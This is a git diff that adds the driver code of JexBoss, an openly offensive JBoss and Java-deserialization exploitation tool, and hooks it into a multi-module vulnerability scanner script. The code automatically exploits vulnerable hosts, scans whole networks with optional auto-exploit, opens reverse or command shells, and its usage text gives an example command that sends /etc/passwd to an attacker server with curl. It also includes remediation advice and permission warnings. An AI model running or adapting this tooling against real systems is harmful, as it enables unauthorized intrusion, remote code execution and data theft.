print_and_flush(RED + " * Error contacting the command shell. Try again and see logs for details ...") + logging.error("Error contacting the command shell", exc_info=traceback) + continue + + resp = str(r.data) + if r.status == 404: + print_and_flush(RED + " * Error contacting the command shell. Try again later...") + continue + stdout = "" + try: + stdout = resp.split("pre>")[1] + except: + print_and_flush(RED + " * Error contacting the command shell. Try again later...") + if stdout.count("An exception occurred processing JSP page") == 1: + print_and_flush(RED + " * Error executing command \"%s\". " % cmd.split("=")[1] + ENDC) + else: + print_and_flush(stdout.replace('\\n', '\n')) + + +def clear(): + """ + Clears the console + """ + if name == 'posix': + system('clear') + elif name == ('ce', 'nt', 'dos'): + system('cls') + + +def banner(): + """ + Print the banner + """ + clear() + print_and_flush(RED1 + "\n * --- JexBoss: Jboss verify and EXploitation Tool --- *\n" + " | * And others Java Deserialization Vulnerabilities * | \n" + " | |\n" + " | @author: João Filho Matos Figueiredo |\n" + " | @contact: joaomatosf@gmail.com |\n" + " | |\n" + " | @update: https://github.com/joaomatosf/jexboss |\n" + " #______________________________________________________#\n") + print_and_flush(RED1 + " @version: %s" % __version__) + print_and_flush (ENDC) + + +def help_usage(): + usage = (BOLD + BLUE + " Examples: [for more options, type python jexboss.py -h]\n" + ENDC + + BLUE + "\n For simple usage, you must provide the host name or IP address you\n" + " want to test [-host or -u]:\n" + + GREEN + "\n $ python jexboss.py -u https://site.com.br" + + + BLUE + "\n\n For Java Deserialization Vulnerabilities in HTTP POST parameters. \n" + " This will ask for an IP address and port to try to get a reverse shell:\n" + + GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize" + + + BLUE + "\n\n For Java Deserialization Vulnerabilities in a custom HTTP parameter and \n" + " to send a custom command to be executed on the exploited server:\n" + + GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize\n" + " -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'" + + + BLUE + "\n\n For Java Deserialization Vulnerabilities in a Servlet (like Invoker):\n"+ + GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize\n" + + + BLUE + "\n\n To test Java Deserialization Vulnerabilities with DNS Lookup:\n" + + GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/path --gadget dns --dns test.yourdomain.com" + + + BLUE + "\n\n For Jenkins CLI Deserialization Vulnerabilitie:\n"+ + GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/jenkins --jenkins"+ + + BLUE + "\n\n For Apache Struts2 Vulnerabilities (CVE-2017-5638):\n" + + GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/path.action --struts2\n" + + + BLUE + "\n\n For auto scan mode, you must provide the network in CIDR format, " + "\n list of ports and filename for store results:\n" + + GREEN + "\n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 \n" + " -results report_auto_scan.log" + + + BLUE + "\n\n For file scan mode, you must provide the filename with host list " + "\n to be scanned (one host per line) and filename for store results:\n" + + GREEN + "\n $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log\n" + ENDC) + return usage + + +def network_args(string): + try: + if version_info[0] >= 3: + value = ipaddress.ip_network(string) + else: + value = ipaddress.ip_network(unicode(string)) + except: + msg = "%s is not a network address in CIDR format." % string + logging.error("%s is not a network address in CIDR format." % string) + raise argparse.ArgumentTypeError(msg) + return value + + +def main(): + """ + Run interactively. Call when the module is run by itself. + :return: Exit code + """ + # check for Updates + if not gl_args.disable_check_updates: + updates = _updates.check_updates() + if updates: + print_and_flush(BLUE + BOLD + "\n\n * An update is available and is recommended update before continuing.\n" + + " Do you want to update now?") + if not sys.stdout.isatty(): + print_and_flush(" YES/no? ", same_line=True) + pick = input().lower() if version_info[0] >= 3 else raw_input().lower() + else: + pick = input(" YES/no? ").lower() if version_info[0] >= 3 else raw_input(" YES/no? ").lower() + + print_and_flush(ENDC) + if pick != "no": + updated = _updates.auto_update() + if updated: + print_and_flush(GREEN + BOLD + "\n * The JexBoss has been successfully updated. Please run again to enjoy the updates.\n" +ENDC) + exit(0) + else: + print_and_flush(RED + BOLD + "\n\n * An error occurred while updating the JexBoss. Please try again..\n" +ENDC) + exit(1) + + vulnerables = False + # check vulnerabilities for standalone mode + if gl_args.mode == 'standalone': + url = gl_args.host + scan_results = check_vul(url) + # performs exploitation for jboss vulnerabilities + for vector in scan_results: + if scan_results[vector] == 200 or scan_results[vector] == 500: + vulnerables = True + if gl_args.auto_exploit: + auto_exploit(url, vector) + else: + + if vector == "Application Deserialization": + msg_confirm = " If successful, this operation will provide a reverse shell. You must enter the\n" \ + " IP address and Port of your listening server.\n" + else: + msg_confirm = " If successful, this operation will provide a simple command shell to execute \n" \ + " commands on the server..\n" + + print_and_flush(BLUE + "\n\n * Do you want to try to run an automated exploitation via \"" + + BOLD + vector + NORMAL + "\" ?\n" + + msg_confirm + + RED + " Continue only if you have permission!" + ENDC) + if not sys.stdout.isatty(): + print_and_flush(" yes/NO? ", same_line=True) + pick = input().lower() if version_info[0] >= 3 else raw_input().lower() + else: + pick = input(" yes/NO? ").lower() if version_info[0] >= 3 else raw_input(" yes/NO? ").lower() + + if pick == "yes": + auto_exploit(url, vector) + + # check vulnerabilities for auto scan mode + elif gl_args.mode == 'auto-scan': + file_results = open(gl_args.results, 'w') + file_results.write("JexBoss Scan Mode Report\n\n") + for ip in gl_args.network.hosts(): + if gl_interrupted: break + for port in gl_args.ports.split(","): + if check_connectivity(ip, port): + url = "{0}:{1}".format(ip,port) + ip_results = check_vul(url) + for key in ip_results.keys(): + if ip_results[key] == 200 or ip_results[key] == 500: + vulnerables = True + if gl_args.auto_exploit: + result_exploit = auto_exploit(url, key) + if result_exploit: + file_results.write("{0}:\t[EXPLOITED VIA {1}]\n".format(url, key)) + else: + file_results.write("{0}:\t[FAILED TO EXPLOITED VIA {1}]\n".format(url, key)) + else: + file_results.write("{0}:\t[POSSIBLY VULNERABLE TO {1}]\n".format(url, key)) + + file_results.flush() + else: + print_and_flush (RED+"\n * Host %s:%s does not respond."% (ip,port)+ENDC) + file_results.close() + # check vulnerabilities for file scan mode + elif gl_args.mode == 'file-scan': + file_results = open(gl_args.out, 'w') + file_results.write("JexBoss Scan Mode Report\n\n") + file_input = open(gl_args.file, 'r') + for url in file_input.readlines(): + if gl_interrupted: break + url = url.strip() + ip = str(parse_url(url)[2]) + port = parse_url(url)[3] if parse_url(url)[3] != None else 80 + if check_connectivity(ip, port): + url_results = check_vul(url) + for key in url_results.keys(): + if url_results[key] == 200 or url_results[key] == 500: + vulnerables = True + if gl_args.auto_exploit: + result_exploit = auto_exploit(url, key) + if result_exploit: + file_results.write("{0}:\t[EXPLOITED VIA {1}]\n".format(url, key)) + else: + file_results.write("{0}:\t[FAILED TO EXPLOITED VIA {1}]\n".format(url, key)) + else: + file_results.write("{0}:\t[POSSIBLY VULNERABLE TO {1}]\n".format(url, key)) + + file_results.flush() + else: + print_and_flush (RED + "\n * Host %s:%s does not respond." % (ip, port) + ENDC) + file_results.close() + + # resume results + if vulnerables: + banner() + print_and_flush(RED + BOLD+" Results: potentially compromised server!" + ENDC) + if gl_args.mode == 'file-scan': + print_and_flush(RED + BOLD + " ** Check more information on file {0} **".format(gl_args.out) + ENDC) + elif gl_args.mode == 'auto-scan': + print_and_flush(RED + BOLD + " ** Check more information on file {0} **".format(gl_args.results) + ENDC) + + print_and_flush(GREEN + " ---------------------------------------------------------------------------------\n" + +BOLD+ " Recommendations: \n" +ENDC+ + GREEN+ " - Remove web consoles and services that are not used, eg:\n" + " $ rm web-console.war http-invoker.sar jmx-console.war jmx-invoker-adaptor-server.sar admin-console.war\n" + " - Use a reverse proxy (eg. nginx, apache, F5)\n" + " - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n" + " - Search vestiges of exploitation within the directories \"deploy\" and \"management\".\n" + " - Do NOT TRUST serialized objects received from the user\n" + " - If possible, stop using serialized objects as input!\n" + " - If you need to work with serialization, consider migrating to the Gson lib.\n" + " - Use a strict whitelist with Look-ahead[3] before deserialization\n" + " - For a quick (but not definitive) remediation for the viewState input, store the state \n" + " of the view components on the server (this will increase the heap memory consumption): \n" + " In web.xml, change the \"client\" parameter to \"server\" on STATE_SAVING_METHOD.\n" + " - Upgrade Apache Struts: https://cwiki.apache.org/confluence/display/WW/S2-045\n" + "\n References:\n" + " [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n" + " [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n" + " [3] - https://www.ibm.com/developerworks/library/se-lookahead/\n" + " [4] - https://www.owasp.org/index.php/Deserialization_of_untrusted_data\n" + "\n" + " - If possible, discard this server!\n" + " ---------------------------------------------------------------------------------") + else: + print_and_flush(GREEN + "\n\n * Results: \n" + + " The server is not vulnerable to bugs tested ... :D\n" + ENDC) + # infos + print_and_flush(ENDC + " * Info: review, suggestions, updates, etc: \n" + + " https://github.com/joaomatosf/jexboss\n") + + print_and_flush(GREEN + BOLD + " * DONATE: " + ENDC + "Please consider making a donation to help improve this tool,\n" + + GREEN + BOLD + " * Bitcoin Address: " + ENDC + " 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C \n" ) + + +print_and_flush(ENDC) + +#banner() + + +if __name__ == "__main__": + + + parser = argparse.ArgumentParser( + formatter_class=argparse.RawDescriptionHelpFormatter, + #description="JexBoss v%s: JBoss verify and EXploitation Tool" %__version, + description=textwrap.dedent(RED1 + + "\n # --- JexBoss: Jboss verify and EXploitation Tool --- #\n" + " | And others Java Deserialization Vulnerabilities | \n" + " | |\n" + " | @author: João Filho Matos Figueiredo |\n" + " | @contact: joaomatosf@gmail.com |\n" + " | |\n" + " | @updates: https://github.com/joaomatosf/jexboss |\n" + " #______________________________________________________#\n" + " @version: " + __version__ + "\n" + help_usage()), + epilog="", + prog="JexBoss" + ) + + group_standalone = parser.add_argument_group('Standalone mode') + group_advanced = parser.add_argument_group('Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER)') + group_auto_scan = parser.add_argument_group('Auto scan mode') + group_file_scan = parser.add_argument_group('File scan mode') + + # optional parameters --------------------------------------------------------------------------------------- + parser.add_argument('--version', action='version', version='%(prog)s ' + __version__) + parser.add_argument("--auto-exploit", "-A", help="Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!)", + action='store_true') + parser.add_argument("--disable-check-updates", "-D", help="Disable two updates checks: 1) Check for updates " + "performed by the webshell in exploited server at http://webshell.jexboss.net/jsp_version.txt and 2) check for updates " + "performed by the jexboss client at http://joaomatosf.com/rnp/releases.txt", + action='store_true') + parser.add_argument('-mode', help="Operation mode (DEFAULT: standalone)", choices=['standalone', 'auto-scan', 'file-scan'], default='standalone') + parser.add_argument("--app-unserialize", "-j", + help="Check for java unserialization vulnerabilities in HTTP parameters (eg. javax.faces.ViewState, " + "oldFormData, etc)", action='store_true') + parser.add_argument("--servlet-unserialize", "-l", + help="Check for java unserialization vulnerabilities in Servlets (like Invoker interfaces)", + action='store_true') + parser.add_argument("--jboss", help="Check only for JBOSS vectors.", action='store_true') + parser.add_argument("--jenkins", help="Check only for Jenkins CLI vector (CVE-2015-5317).", action='store_true') + parser.add_argument("--struts2", help="Check only for Struts2 Jakarta Multipart parser (CVE-2017-5638).", action='store_true') + parser.add_argument("--jmxtomcat", help="Check JMX JmxRemoteLifecycleListener in Tomcat (CVE-2016-8735 and " + "CVE-2016-3427). OBS: Will not be checked by default.", action='store_true') + + parser.add_argument('--proxy', "-P", help="Use a http proxy to connect to the target URL (eg. -P http://192.168.0.1:3128)", ) + parser.add_argument('--proxy-cred', "-L", help="Proxy authentication credentials (eg -L name:password)", metavar='LOGIN:PASS') + parser.add_argument('--jboss-login', "-J", help="JBoss login and password for exploit admin-console in JBoss 5 and JBoss 6 " + "(default: admin:admin)", metavar='LOGIN:PASS', default='admin:admin') + parser.add_argument('--timeout', help="Seconds to wait before timeout connection (default 3)", default=3, type=int) + + parser.add_argument('--cookies', help="Specify cookies for Struts 2 Exploit. Use this to test features that require authentication. " + "Format: \"NAME1=VALUE1; NAME2=VALUE2\" (eg. --cookie \"JSESSIONID=24517D9075136F202DCE20E9C89D424D\"" + , type=str, metavar='NAME=VALUE') + #parser.add_argument('--retries', help="Retries when the connection timeouts (default 3)", default=3, type=int) + + # advanced parameters --------------------------------------------------------------------------------------- + group_advanced.add_argument("--reverse-host", "-r", help="Remote host address and port for reverse shell when exploiting " + "Java Deserialization Vulnerabilities in application layer " + "(for now, working only against *nix systems)" + "(eg. 192.168.0.10:1331)", type=str, metavar='RHOST:RPORT') + group_advanced.add_argument("--cmd", "-x", + help="Send specific command to run on target (eg. curl -d @/etc/passwd http://your_server)" + , type=str, metavar='CMD') + group_advanced.add_argument("--dns", help="Specifies the dns query for use with \"dns\" Gadget", type=str, metavar='URL') + group_advanced.add_argument("--windows", "-w", help="Specifies that the commands are for rWINDOWS System$ (cmd.exe)", + action='store_true') + group_advanced.add_argument("--post-parameter", "-H", help="Specify the parameter to find and inject serialized objects into it." + " (egs. -H javax.faces.ViewState or -H oldFormData (<- Hi PayPal =X) or others)" + " (DEFAULT: javax.faces.ViewState)", + default='javax.faces.ViewState', metavar='PARAMETER') + group_advanced.add_argument("--show-payload", "-t", help="Print the generated payload.", + action='store_true') + group_advanced.add_argument("--gadget", help="Specify the type of Gadget to generate the payload automatically." + " (DEFAULT: commons-collections3.1 or groovy1 for JenKins)", + choices=['commons-collections3.1', 'commons-collections4.0', 'jdk7u21', 'jdk8u20', 'groovy1', 'dns'], + default='commons-collections3.1') + group_advanced.add_argument("--load-gadget", help="Provide your own gadget from file (a java serialized object in RAW mode)", + metavar='FILENAME') + group_advanced.add_argument("--force", "-F", + help="Force send java serialized gadgets to URL informed in -u parameter. This will " + "send the payload in multiple formats (eg. RAW, GZIPED and BASE64) and with " + "different Content-Types.",action='store_true') + + # required parameters --------------------------------------------------------------------------------------- + group_standalone.add_argument("-host", "-u", help="Host address to be checked (eg. -u http://192.168.0.10:8080)", + type=str) + + # scan's mode parameters --------------------------------------------------------------------------------------- + group_auto_scan.add_argument("-network", help="Network to be checked in CIDR format (eg. 10.0.0.0/8)", + type=network_args, default='192.168.0.0/24') + group_auto_scan.add_argument("-ports", help="List of ports separated by commas to be checked for each host " + "(eg. 8080,8443,8888,80,443)", type=str, default='8080,80') + group_auto_scan.add_argument("-results", help="File name to store the auto scan results", type=str, + metavar='FILENAME', default='jexboss_auto_scan_results.log') + + group_file_scan.add_argument("-file", help="Filename with host list to be scanned (one host per line)", + type=str, metavar='FILENAME_HOSTS') + group_file_scan.add_argument("-out", help="File name to store the file scan results", type=str, + metavar='FILENAME_RESULTS', default='jexboss_file_scan_results.log') + + gl_args = parser.parse_args() + + if (gl_args.mode == 'standalone' and gl_args.host is None) or \ + (gl_args.mode == 'file-scan' and gl_args.file is None) or \ + (gl_args.gadget == 'dns' and gl_args.dns is None): + banner() + print (help_usage()) + exit(0) + else: + configure_http_pool() + _updates.set_http_pool(gl_http_pool) + _exploits.set_http_pool(gl_http_pool) + banner() + if gl_args.proxy and not is_proxy_ok(): + exit(1) + if gl_args.gadget == 'dns': gl_args.cmd = gl_args.dns + main() + +if __name__ == '__testing__': + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": get_random_user_agent()} + + timeout = Timeout(connect=1.0, read=3.0) + gl_http_pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE') + _exploits.set_http_pool(gl_http_pool) + + diff --git a/moon.py b/moon.py index 10fee12..6a18760 100644 --- a/moon.py +++ b/moon.py @@ -12,6 +12,7 @@ import navigate_vuln.Main_navigate import gatepass_vuln.Main_gatepass import ipq.Main_ipq import spring_vuln.Main_spring +import jboss.Main_jboss if __name__ == "__main__": @@ -59,6 +60,9 @@ modul:ip ipq spring_vuln.Main_spring.exec(sys.argv[3]) elif sys.argv[2] == 'ipq': ipq.Main_ipq.exec(sys.argv[3]) + elif sys.argv[2] == 'jboss': + jboss.Main_jboss.exec(sys.argv[3]) + else: